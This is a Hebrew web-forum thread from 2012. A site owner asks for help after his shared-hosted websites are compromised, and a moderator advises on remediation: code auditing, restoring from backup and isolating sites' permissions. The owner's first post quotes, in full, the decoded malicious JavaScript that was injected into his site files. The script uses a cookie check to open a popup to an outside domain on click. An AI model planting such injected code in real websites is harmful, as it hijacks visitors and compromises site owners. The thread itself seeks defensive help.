לוגו אתר Fresh          

אפשרות תפריט  ראשי     אפשרות תפריט  צ'אט     אפשרות תפריט  מבזקים     אפשרות תפריט  צור קשר     חץ שמאלה חץ ימינה  

לך אחורה   לובי הפורומים > מחשבים > חומרה ורשתות
שמור לעצמך קישור לדף זה באתרי שמירת קישורים חברתיים
תגובה

כלי אשכול חפש באשכול זה

ישן 07-11-2012, 21:50
  yoniseo yoniseo אינו מחובר  

חבר מתאריך: 07.11.12
גם פרצו גם גנבו וגם שתלו קוד - זקוק לעזרה

יש לי כמות נכבדת של אתרים שיושבים על שרת של חברת Funio (שייכת לiWeb) לפני יומיים שמתי שבכל פעם שאני נכנס לאתרים שלי קופץ לי חלון פופאפ שמוביל לאתר אחר http://www.allfromnet.net
האתרים שלי לא מקפיצים שום חלונות כך שידעתי שזה משהו בעייתי חיפשתי בין הקודים ומצאתי שמישהו שתל לי קוד בתוך חלק מקבצי הג׳אווה סקריפט של האתר
הקוד הוכנס בקודים של אסקי והתרגום שלו הוא
function CCK(name,value,days){var date,expires;if(days){date=new Date();date.setTime(date.getTime()+(days*24*60*60* 1000));expires=";expires="+date.toGMTString();}else{expires="";}document.cookie=name+"="+value+expires+";path=/";}function RCK(name){var i,c,ca,nameEQ=name+"=";ca=document.cookie.split(';');for(i=0;i<ca.length;i++){c=ca[i];while(c.charAt(0)==' '){c=c.substring(1,c.length);}if(c.indexOf(nameEQ) ==0){return c.substring(nameEQ.length,c.length);}}return '';}if(RCK("google-ads-5854412595")!=1){var xol=window.onload;window.onload=function(){if(type of xol=='function')xol();window.addEventListener("click",function(){CCK("google-ads-5854412595",1,1);window.open('http://www.allfromnet.net');window.location.reload();},tr ue);}}

בנוסף לכל הכאב ראש הזה
שמתי לב שהאתר שנפתח allfromnet.net
לא רק ששתל קוד אלא האתר שנפתח הוא אתר שגנב את הנתונים שלו מתוך הDb שלי
למרות שנראה שהוא לא מחובר אונליין

היום בבוקר מחקתי את כל הקודים ובערב ראיתי שכול הקודים חזרו שוב

מה אני יכול לעשות ?
תגובה ללא ציטוט תגובה עם ציטוט חזרה לפורום
ישן 08-11-2012, 05:40
  שימיadmin שימי אינו מחובר  
מנהל פורומי "תכנות ובניית אתרים" ו"חומרה ורשתות"

חבר מתאריך: 25.10.01
בתגובה להודעה מספר 3 שנכתבה על ידי yoniseo שמתחילה ב "תודה על התגובה אבל איך עושים את זה ?"

אין נוסחת קסם שאני יכול להגיד לך 1,2,3.... צריך להסתכל על הדברים, צריך לראות מה השתנה ואיך, צריך לבדוק לוגים... צריך לעשות auditing על הקוד שלך אם מגיעים למסקנה שהבעייה לא הייתה בשרת... (שלא לדבר על זה שכיוון שהשרת לא שלך, תצטרך שיתוף פעולה של בעל השרת, שלא בטוח שתקבל...)

זה לא שאני יכול לתת לך פקודה שתגלה לך את התשובה... זה פשוט ידע שאתה צריך שיהיה לך, ידע שאוספים במשך שנים ובעצם אף פעם לא מפסיקים ללמוד...

יותר מזה - אם הבעייה הייתה מספיק חמורה והפורץ מספיק חכם - ייתכן שלא תמצא לעולם כיצד הוא נכנס. כמובן שבמקרה זה תרצה לעשות בדיקה על הקוד שלך כפי שהוא שמור אצלך (ולא בשרת, כי אולי הפורץ תיקן את הבאג שעל השרת כדי שאחרים לא יוכלו לפרוץ כמו שהוא פרץ - דבר די נפוץ) - ובשביל זה אתה צריך להבין באבטחת מידע (זה שקוד נחזה להיות פועל במקרים שאתה בדקת, לא אומר שאתה בדקת גם את המקרים הבעייתיים). ואולי הוא נכנס דרך אתרים אחרים שעל אותו שרת שבהם היה באג אבטחה...

לסיכום - לא פשוט, ולא ניתן לענות על הדבר הזה על רגל אחת.

ישן 08-11-2012, 07:20

שימי המון תודה על ההסבר כמה שאלות
בתגובה להודעה מספר 4 שנכתבה על ידי שימי שמתחילה ב "אין נוסחת קסם שאני יכול להגיד..."

1. אם אני יעלה את הגירסאות הקודמות שיש לי האם זה יכול לעזור?
2. אתמול קיבלתי הודעה מהאחסון שהם מצאו shell access מאחד הקבצים שיש לי בשרת והם הסירו אותו
הבעיה היא שהקוד שוב חזר ככה שאני מניח שיש עוד מקום איפה שהוא בשרת שבו יש את אותה גישה או משהו אחר
3. האם החלפה של אחסון יכולה לעזור במקרה הזה?
4. האם אפשר לשכור את שרותייך בתשלום כמובן לנושא ? או לחילופין האם יש חברה מסויימת שאתה יכול להמליץ עליה ויכולה למצוא את הבעיה
5. אם האתרים היו מאוחסנים על שרת דדיקייטד האם הייתי יכול למצוא את הבעיה בצורה יותר קלה?
6. שאלה אחרונה ומצטער על האורך , האם יש דברים מסויימים או תוספות מסויימות שאני יכול לרכוש כדי להגן על האתרים שלי בשרתים שלי?

תודה
ישן 08-11-2012, 07:34

בתגובה להודעה מספר 5 שנכתבה על ידי yoniseo שמתחילה ב "שימי המון תודה על ההסבר כמה שאלות"

1. אם הבאג היה בקוד שלך, אז אא"כ בגירסאות הקודמות לא היה הבאג, והוא באג שנוצר בתוספת חדשה שיצרת לקוד, הגירסא הישנה לא תועיל בדבר. לכל היותר היא תפתח מחדש את פרצת האבטחה שאולי הפורץ תיקן ... כלומר תחמיר את המצב, מבחינתך

2. מן הסתם אם שום דבר לא שונה בסביבה, ומה שהיה פתוח לא נחסם (או נחסם על ידי הפורץ, אבל הוא דאג להשאיר דלת אחורית שרק הוא יכול להשתמש בה) - מחיקה של תוספת שהוא שם כדי לגשת בנוחות לשרת לא תשנה שום דבר (בדיוק כמו בסעיף 1) - הוא פשוט יחזור על מה שהוא עשה קודם..

3. אם הקוד שלך לא מאובטח, הוא יהיה לא מאובטח בכל חברת אירוח אתרים, שהרי הבעייה בקוד שלך. מצד שני, אם חברה מסויימת מריצה את כל האתרים בסביבות נפרדות, ויש לך שמות משתמשים נפרדים לכל סביבה, וסביבה א' לא יכולה לגעת בקבצים של סביבה ב', ואף אחד לא גילה את הסיסמאות שלך (למשל על ידי סוס טרוייאני על המחשב שלך), אזי באירוח שכזה, פריצה לאתר אחד, לא תשפיע על האתרים האחרים - כי הם נפרדים אחד מהשני לחלוטין...

4. אני שכיר, לא פרילאנסר, אז לא. לא מכיר חברות שעוסקות בזה מספיק כדי להמליץ. כן יכול להגיד לך שיש המון שרלטנים בתחום הזה... מי שחושב שלהתקין מוצר יקר ב 10000 דולר זה איזשהו קסם שפותר כל בעייה, הוא קשקשן. לדעתי האישית כמובן.

5. רק אם הייתה הפרדה מוחלטת בין האתרים כפי שנכתב בסעיף 3 בהודעה זו. כמובן שאין קשר לדדיקייטד, משום שאת מה שכתבתי ב 3 אפשר לעשות גם באירוח משותף. כמובן שבשרת פרטי משל עצמך, אתה יכול להקשיח אפילו יותר, כי אתה יכול לעשות דברים שמיוחדים עבורך, ואין לך את הצורך לתמוך ב"כל מה שכל לקוח יעלה לשרת". מצד שני, אתה צריך להבין במה שאתה עושה, כי אחרת אתה רק עלול להחמיר את רמת הפגיעות שלך...

6. לרכוש? לדעתי לא. אפשר לשים IPS בין האינטרנט לשרת, אבל זה יעזור רק במידה ומישהו מנסה לנצל משהו שיוצרי ה IPS חשבו עליו. לא משהו שלא. אין תחליף לכתיבת קוד מאובטח... זו הסיבה שגם לחברות ענק (כולל חברות אבטחה) עם משאבים פיננסיים שיכולים להחשב "בלתי מוגבלים" - עדיין פורצים. רק מהשבוע... http://thehackernews.com/2012/11/im...c-database.html

ישן 11-11-2012, 17:24

נראה לי שמצאתי את הקוד הבעייתי השאלה מה עכשיו
בתגובה להודעה מספר 1 שנכתבה על ידי yoniseo שמתחילה ב "גם פרצו גם גנבו וגם שתלו קוד - זקוק לעזרה"

מצאתי קובץ בשם log.php שהתווסף לתיקייה tiny_mce
אצלי קובץ שלא היה שם קודם וכשניסיתי לשמור אותו על המחשב שלי ראיתי שהאנטיוירוס מזהה אותו כקובץ זדוני השאלה מה עכשיו
מחקתי את הקובץ אבל הוא עדיין מצליח להחזיר את הקוד גאווה סקריפט שלו
ניסיתי להעלות אותו לכאן אבל זה לא ממש עובד
ואני גם לא מצליח לשמור אותו על המחשב שלי בגלל שאנטיוירוס מוחק אותו מיד
כשעשיתי חיפוש באינטרנט ראיתי מישהו שהיה לו משהו דומה
הקובץ ששם דומה למה שיש אצלי רק שאצלי הוא הרבה הרבה יותר ארוך
http://www.surmunity.com/showthread.php/20369-Help!-webserver-being-hacked!
השאלה מה אפשר לעשות בנושא?

נערך לאחרונה ע"י yoniseo בתאריך 11-11-2012 בשעה 17:28.
ישן 11-11-2012, 17:39

אם זה האתר הבעייתי אז אני יוכל לפנות למכנת שבנה אותו
בתגובה להודעה מספר 15 שנכתבה על ידי שימי שמתחילה ב "הכל יכול להיות. יכול להיות..."

ולדרוש ממנו שיבדוק את הקודים שייודא שהם מאובטחים וכו'
אם זה לא מכאן אז אני צריך להמשיך ולחפש את הבעיה
בנתיים מה שנאי מנסה לעשות זה כמו שאמרתי לעבור לשרת דדיקייטיד לפני שאני יתחיל להעלות לשם משהו לתת למומחה כלשהו להקשיח את ההגנה על השרת ואז הלעלות לשם קבצים מעודכנים כשאשר הרשאות יהיו כך שכל אתר יעמוד בעצם בפני עצמו ולא יתאפשר מעבר מאתר אחד לשני (לפחות זה מה שאני ינסה להשיג)
אני מנסה לבודד את הבעיה כדי שנאי יוכל לנסות למצוא את הדרך לתקן אותה
הרי ידיעת הבעיה היא חצי מהדרך לפיתרון
אם יש אילו שהם תובנות בנושא אני ישמח לדעת לפני שאני עושה מהלכים מרחיקי לכת
אגב
האם משהו בקובץ הסיוטי הזה יכול לתת רמז איפה עוד שתול קוד בעייתי ?
נקודה נוספת היא שאם באמת הבעיה נבעה מזה שהtiny_mce לא היה מעודכן אז אני יעדכן אותו בגיבוי ישן שיש לי לפני שכל הסיוט התחיל ויעלה חזרה
ישן 11-11-2012, 17:42

בתגובה להודעה מספר 16 שנכתבה על ידי yoniseo שמתחילה ב "אם זה האתר הבעייתי אז אני יוכל לפנות למכנת שבנה אותו"

להפריד הרשאות בין אתרים זה לא מהלך מרחיק לכת, זה בסיס של בסיס. מארח אתרים שלא עושה את זה, אסור לעשות איתו עסקים.

ההפרדה תאפשר לך לדעת אם רק אחד מהאתרים יפרץ בהמשך. אבל אם יש משהו משותף לכולם שבו הבעייה, מן הסתם שזה לא יעזור.

הקובץ הזה הוא סתם שטות שמישהו הוריד מהאינטרנט ולכן אני בספק שיש טעם לנתח אותו...

שוב אני אומר - תעלה עותק מקורי של האתר מגיבוי שלך, ואז סילקת את כל התוספות. כמובן שבאגי האבטחה עדיין יצטרכו להיות מתוקנים. (אל תגיד לי שאין לך גיבוי משל עצמך על המחשב שלך לדברים שאתה עושה... ? במקרה זה, באמת שקשה לי לחשוב איך אתה פותר את זה...)

תגובה

כלי אשכול חפש באשכול זה
חפש באשכול זה:

חיפוש מתקדם
מצבי תצוגה דרג אשכול זה
דרג אשכול זה:

מזער את תיבת המידע אפשרויות משלוח הודעות
אתה לא יכול לפתוח אשכולות חדשים
אתה לא יכול להגיב לאשכולות
אתה לא יכול לצרף קבצים
אתה לא יכול לערוך את ההודעות שלך

קוד vB פעיל
קוד [IMG] פעיל
קוד HTML כבוי
מעבר לפורום

כל הזמנים המוצגים בדף זה הם לפי איזור זמן GMT +2. השעה כעת היא 13:35

הדף נוצר ב 0.09 שניות עם 10 שאילתות

הפורום מבוסס על vBulletin, גירסא 3.0.6
כל הזכויות לתוכנת הפורומים שמורות © 2024 - 2000 לחברת Jelsoft Enterprises.
כל הזכויות שמורות ל Fresh.co.il ©

צור קשר | תקנון האתר